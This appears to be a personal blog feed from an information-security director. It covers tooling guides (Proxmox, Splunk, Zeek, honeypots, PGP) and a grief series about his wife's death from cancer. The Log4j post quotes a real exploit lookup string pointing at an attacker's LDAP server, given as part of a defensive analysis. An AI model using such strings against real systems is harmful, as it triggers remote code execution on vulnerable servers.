Jason Murray

Process Resource Tracker

Sun, 15 Feb 2026 14:13:26 -0600

Overview

When troubleshooting Linux services, I kept running into the same issue: I could inspect a single process, but there wasn’t a clean way to track that process plus all children and sub-children over time in one focused workflow.

That gap is what this project is built to solve.

GitHub: https://github.com/0xJasonMurray/process-resource-tracker

The Details

Existing tools are useful, but incomplete for this use case:

top / htop: strong live visibility, weak historical context
ps: static snapshots
broader observability tools: often too coarse or too heavy for quick process-tree analysis

What was missing was simple, service-scoped tracking that follows the full process family and summarizes behavior over time.

Using uv to manage pyton projects

Sun, 01 Feb 2026 20:54:57 -0600

Using uv (https://docs.astral.sh/uv/) to create and manage python projects, code bases, and virtual environments:

Install uv software on a mac:

brew install uv

Creating the first project:

uv init uvdemoproject

Output:

Initialized project `uvdemoproject` at `/Users/jemurray/Documents/src/personalPython/uvdemoproject`

Edit code:

cd uvdemoproject
vi ./main.py

Execute code:

uv run ./main.py

Output:

jemurray@freelightbulbs uvdemoproject % uv run ./main.py 
Using CPython 3.13.7 interpreter at: /opt/homebrew/opt/python@3.13/bin/python3.13
Creating virtual environment at: .venv
Hello from uvdemoproject!

Add external libraries to a project:

uv add "mcp[cli]"

Output:

Webserver Upgraded to Debian 13

Tue, 16 Dec 2025 16:39:49 -0600

It was finally time to upgrade the old Debian 10 webserver to something more modern. This time I wanted to keep everything as stock and simple as possible.

I created a new Digital Ocean dropplet and enabled IPv6.

Logged into the new system:

ssh jasonmurray.org

Make sure the system is up to date:

sudo apt update && sudo apt upgrade && sudo reboot

Enabled IPv6:

sudo vi /etc/netplan/50-cloud-init.yaml

Adding the following lines to enable IPv6:

Why the Scientific Method Matters

Sat, 06 Sep 2025 15:44:04 -0500

The problem:

Gut feelings and assumptions often fool us.

The fix:

The scientific method gives us a repeatable way to test ideas, find truth, and avoid bias.

How:

Ask: Start with a clear question.
Guess: Make a testable prediction.
Test: Run a fair experiment.
See: Gather and measure results.
Decide: Compare results to your guess.
Share: Tell others what you learned.

The value:

Clarity: Turns curiosity into answers.
Trust: Builds evidence, not opinion.
Progress: Fuels discoveries from vaccines to smartphones.

Bottom line:

Short Bio

Tue, 05 Aug 2025 22:33:56 -0500

Jason Murray is the Senior Director of Information Security at Washington University in St. Louis, where he leads a team focused on keeping the university’s digital environment secure. His group brings together incident response, vulnerability management, ethical hacking, and security engineering.

With more than 30 years of experience in IT and cybersecurity, Jason has spent his career designing and maintaining complex systems in startup companies, Internet service providers, higher education and healthcare. At WashU, he’s focused on building strong security foundations while also helping the university adapt to new challenges — whether that’s implementing automation, streamlining detection and response, or partnering with teams across campus to make smart, secure choices.

I'm Sorry

Tue, 05 Aug 2025 22:02:27 -0500

I’m truly sorry for the behavior of the American President Donald Trump. Myself and the majority of American’s didn’t vote for him nor do we support him.

I would like to apologize on behalf of all Americans who believe in a kinder world.

This is not it.

We don’t support Donald Trump.

What am I doing right NOW?

Tue, 05 Aug 2025 13:15:38 -0600

Last Updated: Aug 8, 2025

Family

Supporting my kids as they pursue their studies in college.

Personal Life

Living in city.
Exploring the world.
Finding my people.
Creating new experiences.
Loving Life.

Work

I am the Senior Director of Incident Response, Vulnerability Management, Ethical Hacking, and Security Engineering at Washington University in St. Louis. I lead a team of talented Security Analysts and Engineers to defend the university from cyber security villains!

Facebook

Wed, 02 Jul 2025 00:28:00 -0500

I deactivated Facebook.

Contact Information

Tue, 18 Feb 2025 18:05:35 -0500

Jason Murray can be reached at the following locations.

Email

For asynchronous communication, please use the email address:

web2025@zweck.net

I’ve stopped using all social media due to the impact it has on people’s social wellbeing. Send me an email if you don’t have my phone/text number.

Secure Communication

Use the following PGP key:

It's Hard to Write

Sat, 30 Nov 2024 12:47:57 -0600

During the covid lockdown I challenged myself to write something every day. I thought it would be easy. I thought I would maintain a blog instead of social media like Facebook, X, etc.

The reality…

Dedicating time to write is hard. Using a content management system like Hugo is hard(er) since it requires intentionally getting out my laptop to do the writing.

Someday, I hope to be disciplined enough to write more regularly. Until then…

One Year Later: Dec 04, 2023

Mon, 04 Dec 2023 19:40:10 -0600

One year ago today, our world completely changed. While laying in bed with my dog and a laptop, I look to my right and see the empty spot that Jami used to occupy.

I’m am not filled with unbearable sadness, grief, or loss. I am filled with happiness knowing that she helped build this family in a way that allows us to move forward. She said, “You will not use my death as an excuse for bad behavior or remaining stuck in the past”. She considered being a mother to be her greatest accomplishment. She was right. It is evident by how far we’ve come in the past 12 months.

One Year Later: Dec 03, 2023

Sun, 03 Dec 2023 19:40:10 -0600

I was out with my friend Katie all day and night last night. I didn’t get a chance to post my 12/2/2023 “What was happening a year ago today”. When I looked at my journal this morning here is what I wrote from 12/2/2022:

“Sorry I didn’t write anything today… I am filling in on the 3rd.

I read a LOT of messages from Jami’s family and friends. Wow, that is hard. I loved it. Hearing all the way Jami impacted the lives of so many people is inspiring. I asked family, friends, or anyone listening/reading to send me personal messages. I didn’t want to hear anymore “thinking of you” type messages. Tell me something with meaning. Tell me a story. I know you’re thinking about us.”

One Year Later: Dec 02, 2023

Sat, 02 Dec 2023 19:40:10 -0600

I went out with Katie - I didn’t have time to post anything…

One Year Later: Dec 01, 2023

Fri, 01 Dec 2023 19:40:10 -0600

One year ago today, this is the summary I posted to all of my family and friends:

Cancer does not behave in ways we expect. Jami and I walked into the hospice care center on Tuesday afternoon. Although she was a bit unsteady and had a bad headache, she walked under her own power. Our goal was to get in, figure out the proper pain medications, and walk out. Our plans changed. The cancer is progressing fast. Much faster than I expected.

One Year Later: Nov 30, 2023

Thu, 30 Nov 2023 19:40:10 -0600

One year ago today I wrote in my journal… “I just want to hear her voice again”

Jami does not wake up for more than 30 seconds. For the brief moment she is awake, it is not Jami. She will say a few random words, try to tell us she needs to get out of bed, and then falls right back asleep. She is on 4MG of morphine and a few anti-nausea drugs to keep her comfortable. All day I assumed the narcotics were the reason she was so out of it. Late in the evening, I took one of the nurses aside to have a conversation about Jami’s progression. She told me, “Jami is sleeping, non-talking, lethargic, brain-foggy due to the progression of the disease”. This is the first time it really hit me that the disease is winning. Up until this day, we’ve always been able to see a doctor to get some drugs or perform a surgery and go back home at some point.

One Year Later: Nov 29, 2023

Wed, 29 Nov 2023 19:40:10 -0600

One year ago today was the biggest turning point in my families lives!

No matter what combination of drugs we gave Jami she could not make the pain and nausea go away. We have now been up for days with her puking nearly every hour. (Interesting fact: Over the past 24 hours, I clocked over 9000 steps walking in the house to care for Jami). Jami can’t take it anymore and I called hospice again to see what we can do. They recommended we come into their facility in order to better administer drugs to get her pain and nausea under control. When you are at home we can only use oral drugs which take time to metabolize and get into the blood stream, when you are at a facility they are going to inject them into a vein which has nearly instant results and makes it easier to quickly determine what is working and what does not.

One Year Later: Nov 28, 2023

Tue, 28 Nov 2023 19:40:10 -0600

Warning bad language as well as sad and raw topics in this post… You may want to pass on reading my posts this week.

It seemed fitting that I stay up way past my bed time to write this next post. Tonight I will be a bit sleep deprived, but it relates to the way I felt a year ago today.

Jami (and by proxy myself) didn’t sleep for more then 1 hour that night (11/28/22). Every hour she would wake up and puke in a bucket. Every time she woke up we were balancing a cocktail of drugs from morphine, Tylenol, anti-nausea, and various others (see the photo of the notes I was taking - this is only one of many pages). No combination of medicine, back rubs, cool wash cloths, baths, were helping. She is puking so much, even the medicines didn’t have time to work before they are ejected. At this point I have been up for over 24 hours with no sleep, but I don’t feel tired, I’m just working to keep her comfortable.

One Year Later: Nov 27, 2023

Mon, 27 Nov 2023 19:40:10 -0600

If you don’t want to be sad, I suggest you don’t read my posts for the next week. I’m going to take you on a behind the scenes journey of taking care of someone with cancer in the last week of their lives. Don’t worry, it won’t be too graphic, but this helps me share with the world (my friends) what this journey is like.

I’ve journaled extensively since the day of her cancer diagnosis. I’ve been reading each entry for the past few weeks now. You may be asking why would you put yourself through that pain? I don’t see it as such, I see it as reflections on life. Comparing myself back then with today. Also, I like to feel sad. It helps me to know I am human and connect with the person I’ve loved for so many years. I put my sadness in a time-box. When I want to be sad I turn it on, then when I am done, I turn it off and continue to more forward in my life.

Using iplocate to geolocate IP addresses in Splunk.

Thu, 15 Jun 2023 21:55:41 -0500

Overview

Converting an IP address into a physical location can greatly enhance an Incident Responder’s decision-making process. It enables them to identify patterns or eliminate irrelevant data by focusing on specific countries. With the use of the |iplocate command in Splunk, what was once considered a complex and specialized skill becomes a straightforward task.

Technical Details

In this example, the Zeek connection data is enhanced by including the geolocated source IP address for each connection.

How I Met Your Mother

Sun, 12 Feb 2023 08:11:09 -0600

We met in February of 1996 through our mutual friend Andrea. At the time I was a junior at Saginaw Valley State University and working full time at Concentric Network as a Unix systems administrator. Jami attended the same college, but worked at the Home Depot. She had recently moved to Freeland from Alpena and lived with her parents.

Andrea and I had been good friends since freshman year of high school. She had just started dating someone new, and I was interested in meeting this person. To avoid being a third wheel, Andrea set me up on a blind date with Jami, one of her co-workers from Home Depot.

Convert all HEIC images to jpeg with a single command

Sat, 11 Feb 2023 09:58:06 -0600

Overview

Too many services still do not support HEIC formatted images. Install ImageMagick and run this command to convert them all.

Technical Details

Add this to your ~/.bash_profile so that we don’t have to memorize all the options:

alias convertallheic='for f in *.HEIC *.heic; do magick "$f" -quality 100% "$f.jpg"; done'

Source the file to load it. You don’t have to do this all the time, terminals will typically load aliases on startup:

Would have been our 24 year anniversary

Mon, 19 Dec 2022 21:45:34 -0600

Today would have been our 24th wedding anniversary.

It’s not quite the same without you.

We were young when we got married. I was 23, Jami was 21. We had a lot of friends who said that is too young and we would never make it. Well, we made it until “death do us part” - I would say that is “forever”.

We talked about marriage a few years after dating and spent a bit of time shopping for wedding rings together. Once I had a general idea of what she liked, I purchased the ring and proposed by candle light in her parents basement. I know… Pretty romantic… 🙂

Open Letter from Jami: Bad Behavior Is Not an Option

Mon, 12 Dec 2022 17:53:41 -0600

I asked Jami to talk with and write a letter to our kids that states, “Death is not an excuse for failure or bad behavior…” - This is an excerpt from her journal:

Embrace your new life - say things like Mom would be proud, or Mom was funny, or Mom could be annoying when she bugged me about my friends, or Mom would not want me to do this, or what would Mom think? All of those thoughts are good…be sad when I miss milestones like college move in, engagements, weddings, new jobs, breakups….you just CANNOT STAY THERE or use my loss as an EXCUSE for bad behavior. Get help. Acknowledge you may need some antidepressants or anti anxiety pills, or counseling, or a run or swim at the gym. YOU DO NOT HAVE MY PERMISSION TO USE MY DEATH AS AN EXCUSE FOR BAD BEHAVIOR and DECISION MAKING. No.

Jami's Obituary

Thu, 08 Dec 2022 13:58:33 -0600

Obituary

With heavy hearts, we announce the death of Jami Marie Murray, who passed away from metastatic breast cancer. The day she finally freed herself from cancer was the day Jesus welcomed her into heaven. She was 45 years old.

Jami was born on October 17, 1977 and raised in Alpena, Michigan. She credits her amazing parents, John and Karen, for her faithful, strong, hard-working, and fiery personality. Although, some people say it could be the red hair! She looked up to her sister, Nicky, and brother John Andrew her entire life.

The Final Update Until We Celebrate Life

Sun, 04 Dec 2022 22:25:00 -0600

After 24 years of marriage, two amazing kids, and more memories than we can count…

Jami passed away on December 4, 2022 at 10:25PM

How's Jami Doing: Daily Update - Issue #5 - 12/4/2022

Sun, 04 Dec 2022 16:04:45 -0600

Today’s update is coming out early because I don’t know how much more time we have left.

How’s Jami Doing

Jami continues to decline quickly.
We are probably in the hours to days time range.
She is not moving anymore.
Fluid is building up in her lungs, but it is manageable.
Early this morning her breathing was labored and heavy.
This afternoon her breathing less labored, but still heavy.
She is comfortable.
She is relaxed.
She is surrounded by family and friends both physically and in spirit.

Hospice

How's Jami Doing: Daily Update - Issue #4 - 12/3/2022

Sat, 03 Dec 2022 21:50:41 -0600

Today was a weepy day for me. Telling stories with family and friends, reading your messages, and spending time thinking about all the great memories we made as a family. I love you Jami.

How’s Jami Doing

I don’t have much to report, nothing major has changed.
She is surrounded by family and friends.
The medical staff is increasing the medications to keep her comfortable.
The interval between restlessness is decreasing, which requires more frequent medication.
I will admit, I didn’t read as many text messages today. I wanted to focus more on my 1:1 conversations. I will catch up tonight and tomorrow.
However, I enrolled other family members to read the handwritten letters and cards.
I spoke with her a lot today. I miss her voice.

How’s Jami’s Family Doing

How's Jami Doing: Daily Update - Issue #3.5 - 12/2/2022

Fri, 02 Dec 2022 20:06:45 -0600

Today we gathered our family and spent time with Jami. We told stories, laughed, hugged, and cried.

I’ve asked you all to send me stories that I could read to Jami and you answered. I’ve been reading to her for hours. Some short, some long, some detailed, some to the point. All made me cry.

How’s Jami Doing

She is comfortable.
She is surrounded by family.
She is loved.
She is still declining.
She is not eating or drinking anymore.
She can be restless and agitated, but it is manageable.
She sleeps a lot.
She is not talking at all. Previous days she would say a few words, not anymore.
We are still at the hospice facility. I have no plans to move her at this time.
Family is by her side. We are telling stories, rubbing her back, helping her adjust, and being there for her.
Nothing major has changed today.

Parting Thought

How's Jami Doing: Friends and Family Matter - Issue #3 - 12/2/2022

Fri, 02 Dec 2022 13:18:01 -0600

I have the privilege of reading the messages each of you sent to Jami. Yes, this is a privilege! It is hard. I pause a lot. I cry a lot. But I power through because I know she wants to hear them!

What Have I Learned:

Jami’s impact on you all is overwhelming!
She has touched many people in a variety of ways, but they all have a common theme, “Jami’s friendship made everyone a better person”.
I’ve heard from old friends, family, students, students who are now adults, teachers, long lost friends, relatives, and pretty much everyone Jami has touched over her life.

Your Homework

How's Jami Doing: Daily Update - Issue #2 - 12/1/2022

Thu, 01 Dec 2022 20:36:45 -0600

Cancer does not behave in ways we expect.

Jami and I walked into the hospice care center on Tuesday afternoon. Although she was a bit unsteady and had a bad headache, she walked under her own power. Our goal was to get in, figure out the proper pain medications, and walk out.

Our plans changed.

The cancer is progressing fast. Much faster then I expected.

How’s Jami Doing

She has rapidly declined. Even the doctors and nurses were surprised by the diseases progression.
Mid-afternoon I spoke with the medical team to get an authoritative answer on Jami’s prognoses. They told me there will be no recovery. Her condition is due to the diseases rapid progression, not the pain medication she is on.
I originally assumed the high doses of pain killer were making her groggy and unresponsive. It was not. It’s most likely the cancer in her brain.
You may want to sit down for this one… I asked the team her life expectancy. While they can’t give me specific time, they have two general buckets. Days to Weeks and Weeks to Months. Jami is in the days to week category.
Because of this news, I’ve asked for all of Jami’s immediate family to change their plans and come down as soon as possible. Everyone should be here today or tomorrow.
Early this morning I asked hospice to prepare a plan to take her home. At this point, I don’t think I can do that anymore. Even with our full family team by her side, I don’t feel like we have the capability to keep her comfortable like the hospice facility can. As of 5PM today, I am holding off on trying to bring her home. We will continue to reevaluate as time passes.

This is not the news we want to hear. I wish there was something better I could say, but I can’t.

How's Jami Doing: The Big Update - Issue #1 - 11/30/2022

Wed, 30 Nov 2022 15:47:54 -0600

I’ve created this website (also an email list) to keep Jami’s family and friends updated on what is happening. My intention is to send regular updates, but the exact format is still a work in progress.

This is the first post, buckle up, it will be a long one.

Getting Everyone Up to Speed: Since there are quite a few people to update, I need to level set first to make sure we are all on the same page.

Scooby-Doo and Reflection

Sat, 19 Nov 2022 18:18:50 -0600

Scooby-Doo

Reflection

Fake Phishing: Setup, detection, and take-down

Sun, 13 Nov 2022 16:30:48 -0600

Overview

I’m teaching a class about Phishing. My goal is to explain with a real world example how inexpensive, easy to setup, and tricky it is tell a legitimate site from the real thing. To replicate the phishing site I bought a cheap domain, rented a VPS hosting server, setup DNS, and finally configured a phishing website using Evilginx2.

Within 6 minutes of getting the site up and operational, DigitalOcean (who I host with) and NetCraft (on behalf of Microsoft) sent a cease-and-desist.

Install Win11 Dev VMware Image on the Proxmox Hypervisor

Thu, 27 Oct 2022 22:23:17 -0500

Overview

In addition to a variety of servers running critical Internet services, understanding the desktop environment is another core part of my home lab. In this guide, we will go over what it takes to install a Windows 11 development environment on a Proxmox virtualization server.

Details

Assumptions and Environment

This guide assumes there is a working Proxmox environment.
VM hypervisor setup:
- Proxmox version: Virtual Environment 7.2-11
- System memory: 1T memory
- System drive: 10T drive, the majority is dedicated ZFS storage pool

Download the Windows 11 Dev Image

Start by downloading the free Windows 11 development environment from Microsoft: https://developer.microsoft.com/en-us/windows/downloads/virtual-machines/
ssh into the Proxmox server:
```
ssh root@192.168.86.2
```
cd to a directory with sufficient storage to download a 45G image. In my environment I have a 10T ZFS pool where I store OS images:
```
cd /storage-pool-1/OS-images/win11-dev
```
wget the file VMware image:
```
wget https://aka.ms/windev_VM_vmware
```
unzip the file:
- I had to install unzip first, it is not included with Proxmox:
```
apt install unzip
```
- unzip the file:
```
unzip WinDev2210Eval.VMWare.zip
```

Create a new VM

Configure the VM either from the GUI or the command line with the following settings (replace 666 with the next available VM ID):

qm create 666 --bios ovmf --efidisk0 storage-pool-1-dir:1 --cores 4 --cpu host --machine pc-q35-7.0 --memory 32000 --name 1229-win11-2 --net0 e1000,bridge=vmbr0,firewall=1 --onboot yes --ostype win11 --ide0 storage-pool-1-dir:16 --scsihw virtio-scsi-pci --sockets 4 --memory 32000 --tpmstate0 storage-pool-1-dir:1

Convert Win11 VMDK to QCOW2

Use the qemu-img tool to convert the image from vmdk to qcow2 and place it into the VM image directory. Depending on disk and CPU speed, this may take a while:
```
qemu-img convert -f vmdk /storage-pool-1/OS-images/win11-dev/WinDev2210Eval-disk1.vmdk -O qcow2 /storage-pool-1/vz/images/666/vm-666-disk-1.qcow2
```

Check and remember the size of the newly created qcow2 disk image. In this example, it is 43G:

ls -alh /storage-pool-1/vz/images/666/vm-666-disk-1.qcow2
-rw-r--r-- 1 root root 43G Oct 30 14:11 /storage-pool-1/vz/images/666/vm-666-disk-1.qcow2

When the VM was created, a default raw disk image was created. This is not need and should be deleted:
```
rm /storage-pool-1/vz/images/666/vm-666-disk-1.raw
```

Edit the VM configuration to use the new `qcow2` image

Edit the VM config:
```
vi /etc/pve/local/qemu-server/666.conf
```
Change the line:
```
ide0: storage-pool-1-dir:666/vm-666-disk-1.raw,size=16G
```
to (this is where you will change the image size to the file image size gathered above, in this example 43G)
```
ide0: storage-pool-1-dir:666/vm-666-disk-1.qcow2,size=43G
```

Boot the VM using the Proxmox console

Start the boot process:

Setup Opencanary Honeypot with Pushover Notifications

Sun, 23 Oct 2022 16:59:08 -0500

Overview

Detecting malicious activity on your organizations network is critical to find and track down compromised or rogue devices. Dedicated Opencanary honeypot servers scattered throughout the network can quickly detect and alert when any device interrogates it’s services.

Assumptions and Environment

Dedicated SFF computers (NUC, Raspberry PI’s, etc.)
Base operating system: Ubuntu 22.04LTS server
Working Pushover account (I use the paid version)

Technical Details

Instead of using Docker or Python virtual environments, I’ve dedicated an entire machine to this honeypot. The goal is run these devices on SFF computers, plant them all around the network, and reduce complexity.

Proxmox Initial Setup in my Home Lab

Sun, 16 Oct 2022 17:59:56 -0500

Overview

I’ve replaced all my home lab VMware hypervisors with Proxmox. While we use vmware at work, and gaining experience in this environment is good. I’ve found the “free” tier of vmware for a home lab limiting and difficult to manage. Proxmox has been a pleasure to use, does not have hardware resources limits, and is a easy to keep updated.

Technical Details

Assumptions and Environment

Server Disk Layout:
- 300G boot array
- 10T storage array

Create the Boot Media (using macOS)

Download the latest image: https://www.proxmox.com/en/downloads/category/iso-images-pve
Use balenaEtcher to write the proxmox-ve_7.2-1.iso image to a USB drive.

Boot from USB Drive and Install

Follow the directions on screen.

Web or SSH Into the New Server

Connect to the Web Interface: https://192.168.86.2:8006

Export Infoblox IPv4 Networks into Splunk Lookup Table

Mon, 05 Sep 2022 16:34:41 -0500

I want to search for Infoblox subnets in Splunk using lookup tables like this:

|inputlookup infoblox-ipv4-network-export.csv | search | where cidrmatch(CIDR,"128.252.120.128")  | table CIDR, address*, netmask*, EA-School, comment, domain_name

What follows are the steps to export the data from Infoblox, convert the address and netmask to a CIDR block, import the data into a Splunk lookup table, then search the data using CIDR matching syntax.

Technical Details

First, export the data from Infoblox using the Global CSV export console (Data Management -> IPAM -> CSV Job Manager -> CSV Export -> +):

Using PowerShell to parse Office 365 TimeStamps in JSON format

Sat, 09 Jul 2022 15:15:27 -0500

Given a JSON file with TimeStamp values from a Microsoft Office 365 Search History dump:

PS /Users/jemurray> Get-Content ./ahg.txt -Raw
{"SearchHistoryItems":[{"DisplayText":"test1","TimeStamp":637927286902301816},{"DisplayText":"test2","TimeStamp":637927286812301816},{"DisplayText":"test3","TimeStamp":637927120382301816},{"DisplayText":"test4","TimeStamp":637922768672301816},
....

Convert the TimeStamp values to a human readable format:

PS /Users/jemurray> Get-Content ./ahg.txt -Raw | ConvertFrom-Json | ForEach-Object {$_.PsObject.Properties.Value.TimeStamp} | Get-Date

Wednesday, July 6, 2022 6:24:50 PM
Wednesday, July 6, 2022 6:24:41 PM
Wednesday, July 6, 2022 1:47:18 PM
Friday, July 1, 2022 12:54:27 PM
Thursday, June 30, 2022 9:43:30 PM
Thursday, June 30, 2022 1:47:13 PM
Wednesday, June 29, 2022 8:30:43 PM
Wednesday, June 29, 2022 8:28:10 PM
...

Google G-Suite Legacy to Google Workspace

Thu, 26 May 2022 14:48:18 -0500

Overview

I’ve been a user of the Google G-Suite and Gmail products since their initial inception. In 2022 Google announced they will be discontinuing the free version of G-Suite with a custom domain. Users have until June 27, 2022 to migrate to the paid version. I’ve been looking for an excuse to migrate away from Google for a while now. Because of this decision, I’ve moved my email and custom domain to https://fastmail.com/.

Discover. Create. Solve.

Sun, 22 May 2022 20:23:50 -0500

This kid graduated high school Magna Cum Laude!

We are proud of all your achievements and look forward to the closing of one chapter and the opening of another.

It’s time to go forth and do great things.

Connecting to old ssh servers with unsupported key exchange and cipher types

Tue, 18 Jan 2022 10:16:22 -0600

For those of us who support old hosts with old instances of ssh (quite common on old networking hardware), you may encounter the following errors:

jemurray@phalanges:~ $ ssh host1.example.com
Unable to negotiate with 192.168.0.1 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1

jemurray@phalanges:~ $ ssh host2.example.com
Unable to negotiate with 192.168.0.2 port 22: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1

jemurray@phalanges:~ $ ssh host3.example.com
Unable to negotiate with 192.168.0.3 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

jemurray@phalanges:~ $ ssh -oKexAlgorithms=diffie-hellman-group1-sha1 host2.example.com
Unable to negotiate with 192.168.0.2 port 22: no matching cipher found. Their offer: aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc

Temporary Fix

To temporarily fix these problems, use following command-line options:

Zeek Installation and Splunk CIM Data Normalization Guide

Sun, 16 Jan 2022 10:08:15 -0600

Log files become significantly more helpful when they are properly structured and share common data models with other systems. In this post, I will go over how to send logs from Zeek into Splunk using a CIM compliant data model.

But first, it’s important to understand what a CIM compliant data model is. According to Splunk:

The Splunk Common Information Model (CIM) is a shared semantic model focused on extracting value from data. The CIM is implemented as an add-on that contains a collection of data models, documentation, and tools that support the consistent, normalized treatment of data for maximum efficiency at search time.

How to View a Log4j Payload Using ldapsearch

Thu, 30 Dec 2021 12:35:38 -0600

Log4j received quite a bit of attention over the past few weeks. The vulnerability is incredibly easy to exploit, requires no human interaction, and has the ability to execute any payload a malicious actor injects. But how does it retrieve the payload? What does the JNDI ${jndi:ldap://185.25.51.48:1389/a} string do?

Let’s explore these questions by looking at a real world log4j exploit attempt. These are the actual IP address and exploit code from a real attempt to exploit the log4j vulnerability on my lab network.

Custom PC Build

Sun, 26 Dec 2021 13:15:07 -0600

My son received parts to build a custom gaming rig from Santa. The initial build process took a few hours. Installing the Windows operating system took an entire day.

TL;DR: Save yourself HOURS of frustration, use the Windows Media Creation Tool; BalenaEtcher, dd, etc do NOT work.

Parts List

MSI Forge 100R Case
MSI B450 Tomahawk Max II Motherboard
Ryzen 7 5000 Series Processor
MSI GeForce GTX 1050Ti Graphics Card
Samsung 970 EVO Plus NVMe M.2 Solid State Drive
G.Skill 8G x 2 DDR4 RAM
Kraken X53 Liquid CPU Cooler
EVGA 600W Bronze Power Supply
MSI Optix G24D6P Monitor

Pictures of all the Parts

Splunk 8.2.4 Default Install Apps

Thu, 23 Dec 2021 07:43:57 -0600

The standard apps for a default installation of Splunk 8.2.4 are:

jemurray@splunk:/opt/splunk$ sudo ./bin/splunk display app
alert_logevent                 CONFIGURED          ENABLED             INVISIBLE
alert_webhook                  CONFIGURED          ENABLED             INVISIBLE
appsbrowser                    CONFIGURED          ENABLED             INVISIBLE
introspection_generator_addon  CONFIGURED          ENABLED             INVISIBLE
journald_input                 UNCONFIGURED        ENABLED             INVISIBLE
launcher                       CONFIGURED          ENABLED             VISIBLE
learned                        UNCONFIGURED        ENABLED             INVISIBLE
legacy                         UNCONFIGURED        DISABLED            INVISIBLE
python_upgrade_readiness_app   UNCONFIGURED        ENABLED             VISIBLE
sample_app                     UNCONFIGURED        DISABLED            INVISIBLE
search                         CONFIGURED          ENABLED             VISIBLE
splunk-dashboard-studio        CONFIGURED          ENABLED             VISIBLE
splunk_archiver                CONFIGURED          ENABLED             INVISIBLE
splunk_essentials_8_2          CONFIGURED          ENABLED             VISIBLE
splunk_gdi                     UNCONFIGURED        ENABLED             INVISIBLE
splunk_httpinput               UNCONFIGURED        ENABLED             INVISIBLE
splunk_instrumentation         UNCONFIGURED        ENABLED             VISIBLE
splunk_internal_metrics        UNCONFIGURED        ENABLED             INVISIBLE
splunk_metrics_workspace       UNCONFIGURED        ENABLED             VISIBLE
splunk_monitoring_console      UNCONFIGURED        ENABLED             VISIBLE
splunk_rapid_diag              UNCONFIGURED        ENABLED             VISIBLE
splunk_secure_gateway          UNCONFIGURED        ENABLED             VISIBLE
SplunkForwarder                UNCONFIGURED        DISABLED            INVISIBLE
SplunkLightForwarder           UNCONFIGURED        DISABLED            INVISIBLE

Detecting successful log4j compromises with Zeek and Splunk

Wed, 22 Dec 2021 18:45:00 -0600

By using the log4j Zeek package CVE-2021-44228 and sending the logs off to Splunk, security analysts can detect successful log4j compromises by alerting on hosts reaching out to log4j payload servers.

TL;DR

This Splunk one-liner will first query the zeek_log4j.log to determine the log4j payload IP address then take these results and query the zeek_conn.log to find any successful communication to the payload server(s):

index=zeek sourcetype=zeek_conn [search index=zeek sourcetype=zeek_log4j | dedup target_host | fields target_host | rename target_host as id.resp_h]

Example output (using a bogus log4j payload IP address):

Install Splunk Enterprise in a Lab Environment

Tue, 21 Dec 2021 21:26:05 -0600

A quick start guide to installing Splunk Enterprise on Ubuntu server for a test lab environment.

Download the latest version of Splunk Enterprise. At the time of this writing, the latest version is 8.2.4. Check here for the latest:

wget -O splunk-8.2.4-87e2dda940d1-linux-2.6-amd64.deb 'https://download.splunk.com/products/splunk/releases/8.2.4/linux/splunk-8.2.4-87e2dda940d1-linux-2.6-amd64.deb'

Example output:

jemurray@splunk:~$ wget -O splunk-8.2.4-87e2dda940d1-linux-2.6-amd64.deb 'https://download.splunk.com/products/splunk/releases/8.2.4/linux/splunk-8.2.4-87e2dda940d1-linux-2.6-amd64.deb'
--2021-12-23 03:17:21--  https://download.splunk.com/products/splunk/releases/8.2.4/linux/splunk-8.2.4-87e2dda940d1-linux-2.6-amd64.deb
Resolving download.splunk.com (download.splunk.com)... 2600:9000:2073:e600:1d:f9c1:d100:93a1, 2600:9000:2073:6000:1d:f9c1:d100:93a1, 2600:9000:2073:f800:1d:f9c1:d100:93a1, ...
Connecting to download.splunk.com (download.splunk.com)|2600:9000:2073:e600:1d:f9c1:d100:93a1|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 434892008 (415M) [binary/octet-stream]
Saving to: ‘splunk-8.2.4-87e2dda940d1-linux-2.6-amd64.deb’

splunk-8.2.4-87e2dda940d1-linux-2.6-a 100%[========================================================================>] 414.75M  18.9MB/s    in 24s

2021-12-23 03:17:45 (17.1 MB/s) - ‘splunk-8.2.4-87e2dda940d1-linux-2.6-amd64.deb’ saved [434892008/434892008]

Install the .deb package:

Married for 23 Years / Half of my Life

Sun, 19 Dec 2021 22:23:17 -0600

Today we celebrate our 23rd anniversary! At 46 years old and 23 years married, I’ve spent half my life with this wonderful person.

I love the family we made together. There is no one I would rather spend these years with!

A New Chapter in My Career: Network Architect to Assistant Director

Wed, 08 Dec 2021 18:33:34 -0600

Starting on December 8, 2021 I am transitioning from Network Architect to Assistant Director of Digital Forensics and Incident Response at Washington University in St. Louis.

I’ve been a part of the Network Engineering team for the past 16 years. First as the Sr. Unix Systems Engineer, where I managed hundreds of Unix (Solaris and Linux) hosts. Then Sr. Network and Systems Engineer, designing and managing thousands of networking devices. And finally Network Architect, leading strategic planning.

Installing Windows 2022 Server in a Lab Environment

Wed, 01 Dec 2021 09:00:52 -0600

Download a free and legal copy of Windows Server 2022 (evaluation version) from https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2022

Configure the VMware virtual machine, mount the .iso install image, start the VM, and log into the console (outside the scope of this document):

Select the language:

Select “Install Now”:

The Windows 2002 Server Standard Desktop Edition is selected to simplify management in a home lab environment:

Secure Communications: Generating a New GnuPG Key

Wed, 10 Nov 2021 07:49:47 -0600

A few days ago, I realized I didn’t remember the password to my PGP key and had to revoke it.

While PGP is no longer the most popular way to securely communicate, it is still widely used in the technical community. In this post we will provide the basic steps required to generate a secure PGP key pair on a macOS or Linux machine (anything with a command line).

Install GnuPG using your favorite package manager.

Lost Password: Revoking PGP keys with a revocation certificate

Tue, 09 Nov 2021 10:12:51 -0600

It happened, I can’t remember the passphrase to my PGP key:

gpg: signing failed: Bad passphrase

Many years ago, I signed every email and validate every PGP signature. As time passed, pgp faded into the background as modern email clients lacked support and newer and easier to use tools replaced encrypted email.

Luckily, I had the foresight to create a revocation certificate to revoke my key without the password.

In this guide, we will be revoking the following key:

Configure Client Wireguard VPN Server on Linux

Tue, 02 Nov 2021 10:06:59 -0500

How to use Stanislas’s configuration scripts to configure a WireGuard client VPN server on Linux.

Configuration Details

Linux Server Configuration

Install Wireguard configuration script:

